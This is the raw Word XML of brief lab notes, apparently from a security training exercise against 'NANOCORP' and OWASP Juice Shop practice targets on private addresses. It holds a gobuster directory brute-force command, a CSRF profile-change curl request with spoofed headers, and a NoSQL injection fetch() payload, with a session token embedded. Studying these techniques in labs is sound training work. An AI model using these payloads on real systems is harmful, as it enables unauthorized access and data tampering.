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F61A" w14:textId="77777777" w:rsidR="000055F4" w:rsidRDefault="000055F4" w:rsidP="00692122">
      <w:r>
        <w:t>NANOCORP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D408FF3" w14:textId="5C2C5C90" w:rsidR="00692122" w:rsidRDefault="00692122" w:rsidP="00692122">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF47E6" w14:textId="77777777" w:rsidR="00692122" w:rsidRDefault="00692122" w:rsidP="00692122">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt install wordlists -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D62EAC" w14:textId="426E0E78" w:rsidR="00692122" w:rsidRDefault="00692122" w:rsidP="00692122">
      <w:r>
        <w:t xml:space="preserve">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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C980CE" w14:textId="17EF1D18" w:rsidR="00692122" w:rsidRDefault="00692122" w:rsidP="00692122">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster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-u http://192.168.20.178:51061 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D1A45" w14:textId="445F567F" w:rsidR="00692122" w:rsidRDefault="00692122">
      <w:r>
        <w:t>-w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/wordlists/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EE9B6" w14:textId="77777777" w:rsidR="000055F4" w:rsidRDefault="000055F4"/>
    <w:p w14:paraId="3B1CE640" w14:textId="65C10B6F" w:rsidR="000055F4" w:rsidRDefault="000055F4">
      <w:r>
        <w:t>JUICESHOP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D81C29" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t>curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -X POST "http://192.168.20.47:51271/profile" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD117B" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://htmledit.squarefree.com" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D548B8E" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://htmledit.squarefree.com/" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A8155" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C05CF1" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  -H "Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.WMgyUvGeGRmqAky95Ih8GvEKjKBhBXDkhG6tJHqiD21IFvZvpsrtshaAVPLkRNheaFk3pC0XlVUebFenYlUPdBiMI2yZbvPAvZlXiti7qiBhnJ1XSEu2vU5E52L2jcLqm6qrtmhcpuCV8w08jaSh4VIs3WoRwKhLnnU1O6GJGtA" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BA52D5" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  --data "username=CSRF"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E088195" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E"/>
    <w:p w14:paraId="6760008D" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E"/>
    <w:p w14:paraId="69020FBD" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E"/>
    <w:p w14:paraId="0F22C2CB" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t>await fetch("http://192.168.20.47:51271/rest/products/reviews", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397A642" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  credentials: "include",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD21AE1" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DE89B" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB144FF" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "Accept": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, text/plain, */*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0B770" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "Accept-Language": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.5",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A247F" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "Authorization": "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.WMgyUvGeGRmqAky95Ih8GvEKjKBhBXDkhG6tJHqiD21IFvZvpsrtshaAVPLkRNheaFk3pC0XlVUebFenYlUPdBiMI2yZbvPAvZlXiti7qiBhnJ1XSEu2vU5E52L2jcLqm6qrtmhcpuCV8w08jaSh4VIs3WoRwKhLnnU1O6GJGtA",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6E9B1" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFDEB3" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    "Priority": "u=0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F6A19" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5F84E" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  referrer: "http://192.168.20.47:51271/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A039D27" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  body: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B0D2AF" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    id: { "$ne": -1 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F6488" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">    message: "NoSQL Injection!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591090E4" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9372B6" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  method: "PATCH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4A1F0" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t xml:space="preserve">  mode: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5245E" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E">
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0FC20" w14:textId="77777777" w:rsidR="0069367E" w:rsidRDefault="0069367E" w:rsidP="0069367E"/>
    <w:p w14:paraId="74F89F62" w14:textId="7DC50028" w:rsidR="000055F4" w:rsidRDefault="0069367E">
      <w:r>
        <w:t xml:space="preserve">Inspect, network, put, copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, copy as fetch, console paste above code</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00005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22"/>
    <w:rsid w:val="000055F4"/>
    <w:rsid w:val="001A5090"/>
    <w:rsid w:val="002A0423"/>
    <w:rsid w:val="00470F74"/>
    <w:rsid w:val="00692122"/>
    <w:rsid w:val="0069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FF656"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{25D30A7E-8F47-DB42-8C25-06C40E26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1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1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0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10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4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8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2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0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42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3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49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05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85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91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46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93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68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49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86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10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14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73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2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44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7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4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74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67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48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2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49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01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4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0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39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3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34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0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19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96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73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37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11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24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8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15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45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11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1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joyfulboy0225@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>joyfulboy0225@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-20T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T07:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>